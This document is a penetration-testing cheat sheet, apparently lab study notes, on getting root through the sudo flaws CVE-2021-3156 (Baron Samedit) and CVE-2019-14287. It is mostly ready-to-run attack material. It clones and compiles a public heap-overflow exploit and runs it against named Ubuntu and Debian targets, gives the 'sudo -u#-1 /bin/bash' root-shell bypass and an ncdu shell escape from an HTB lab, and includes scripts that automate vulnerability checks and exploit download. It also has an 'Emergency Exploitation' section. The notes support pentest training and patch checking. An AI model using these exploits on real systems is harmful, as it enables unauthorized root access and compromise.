# Sudo CVE Exploits ## 🎯 Overview Known sudo vulnerabilities provide direct privilege escalation through heap buffer overflow (Baron Samedit) and policy bypass exploits affecting specific sudo versions. ## 🔥 CVE-2021-3156 (Baron Samedit) ### Vulnerability Details * **Impact**: Heap-based buffer overflow → root shell * **Affected Versions**: * 1.8.31 (Ubuntu 20.04) * 1.8.27 (Debian 10) * 1.9.2 (Fedora 33) * **Existed**: Over 10 years undetected ### Version Check ```bash # Check sudo version sudo -V | head -n1 # Sudo version 1.8.31 # Check OS version cat /etc/lsb-release # DISTRIB_RELEASE=20.04 ``` ### Exploitation ```bash # 1. Download Baron Samedit exploit git clone https://github.com/blasty/CVE-2021-3156.git cd CVE-2021-3156 # 2. Compile exploit make # 3. Check available targets ./sudo-hax-me-a-sandwich # 0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 # 1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 # 2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28 # 4. Execute with target ID ./sudo-hax-me-a-sandwich 1 # For Ubuntu 20.04 # Result: root shell ``` ## 🔓 CVE-2019-14287 (Sudo Policy Bypass) ### Vulnerability Details * **Impact**: User ID bypass → privilege escalation * **Affected**: All versions below 1.8.28 * **Method**: Negative user ID (-1) processed as UID 0 (root) ### Prerequisites ```bash # Need sudo access to any command sudo -l # User may run: (ALL) /usr/bin/id ``` ### Exploitation ```bash # Check user ID cat /etc/passwd | grep $(whoami) # user:x:1005:1005:user,,,:/home/user:/bin/bash # Execute with negative ID sudo -u#-1 id # uid=0(root) gid=1005(user) groups=1005(user) # Get full root shell sudo -u#-1 /bin/bash ``` ### HTB Academy Lab Example (CVE-2019-14287) ```bash # 1. Connect to target ssh htb-student@target # 2. Check sudo permissions bash -i sudo -l # User htb-student may run the following commands: # (ALL, !root) /bin/ncdu # 3. Check ncdu manual for exploitation man -P cat ncdu | grep -A 5 "b Spawn shell" # Option 'b' spawns shell in current directory # 4. Execute with negative user ID sudo -u#-1 /bin/ncdu # Press 'b' in ncdu interface # 5. Get root shell and read flag id # uid=0(root) cat /root/flag.txt ``` ## 🔍 Version Enumeration ### Sudo Version Check ```bash # Basic version check sudo -V | head -n1 # Detailed version info sudo -V | grep -E "(version|release)" # Check for specific vulnerable versions sudo -V | grep -E "(1\.8\.(31|27|21)|1\.9\.2)" ``` ### OS Version Correlation ```bash # Ubuntu version cat /etc/lsb-release lsb_release -a # Debian version cat /etc/debian_version # Generic OS info cat /etc/os-release ``` ## 🚀 Quick Exploitation ### CVE-2021-3156 Quick Check ```bash #!/bin/bash version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+") if echo "$version" | grep -qE "(1\.8\.(31|27|21)|1\.9\.[0-2])"; then echo "[!] VULNERABLE to CVE-2021-3156: $version" echo "Download: https://github.com/blasty/CVE-2021-3156.git" fi ``` ### CVE-2019-14287 Quick Check ```bash #!/bin/bash version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+") if sudo -l >/dev/null 2>&1; then if echo "$version" | grep -qE "1\.[0-7]\.|1\.8\.(0|1[0-9]|2[0-7])"; then echo "[!] VULNERABLE to CVE-2019-14287: $version" echo "Exploit: sudo -u#-1 /bin/bash" fi fi ``` ## 🔧 Exploitation Scripts ### Baron Samedit Automation ```bash #!/bin/bash echo "=== CVE-2021-3156 BARON SAMEDIT CHECK ===" version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+") echo "Sudo version: $version" if echo "$version" | grep -qE "(1\.8\.(31|27|21)|1\.9\.[0-2])"; then echo "[!] VULNERABLE to CVE-2021-3156" if [ ! -d "CVE-2021-3156" ]; then echo "[+] Downloading exploit..." git clone https://github.com/blasty/CVE-2021-3156.git cd CVE-2021-3156 && make fi echo "[+] Available exploit targets:" ./CVE-2021-3156/sudo-hax-me-a-sandwich 2>/dev/null || echo "Compile first with 'make'" else echo "[-] Not vulnerable to CVE-2021-3156" fi ``` ### Policy Bypass Test ```bash #!/bin/bash echo "=== CVE-2019-14287 POLICY BYPASS CHECK ===" if sudo -l >/dev/null 2>&1; then echo "[+] Sudo access available" version=$(sudo -V 2>/dev/null | head -n1 | grep -oE "[0-9]+\.[0-9]+\.[0-9]+") if echo "$version" | grep -qE "1\.[0-7]\.|1\.8\.(0|1[0-9]|2[0-7])"; then echo "[!] VULNERABLE to CVE-2019-14287: $version" echo "[+] Testing exploit:" echo "sudo -u#-1 id" else echo "[-] Not vulnerable to CVE-2019-14287" fi else echo "[-] No sudo access" fi ``` ## 🔑 Quick Reference ### Immediate Checks ```bash # Version vulnerability check sudo -V | grep -E "(1\.8\.(31|27|21)|1\.9\.[0-2])" # CVE-2021-3156 sudo -V | grep -E "1\.[0-7]\.|1\.8\.(0|1[0-9]|2[0-7])" # CVE-2019-14287 # Sudo access check sudo -l ``` ### Emergency Exploitation ```bash # CVE-2019-14287 (if vulnerable version + sudo access) sudo -u#-1 /bin/bash # CVE-2021-3156 (if vulnerable version) git clone https://github.com/blasty/CVE-2021-3156.git cd CVE-2021-3156 && make ./sudo-hax-me-a-sandwich 1 # Ubuntu 20.04 ``` ### Alternative Exploits ```bash # Other CVE-2021-3156 exploits # https://github.com/worawit/CVE-2021-3156 # https://github.com/stong/CVE-2021-3156 # Automated exploitation tools # https://github.com/lockedbyte/CVE-Exploits ``` ## ⚠️ Exploit Considerations ### CVE-2021-3156 Notes * **Compilation required** on target or similar system * **OS-specific targets** - must match exact version * **Heap manipulation** - may cause crashes if wrong target * **Success varies** based on system configuration ### CVE-2019-14287 Notes * **Simple exploitation** - one command * **Requires sudo access** to any command * **Limited impact** - only vulnerable versions * **Well-patched** in modern systems *** *Sudo CVE exploits provide direct privilege escalation for specific vulnerable versions - Baron Samedit and Policy Bypass represent critical sudo vulnerabilities requiring immediate patching.*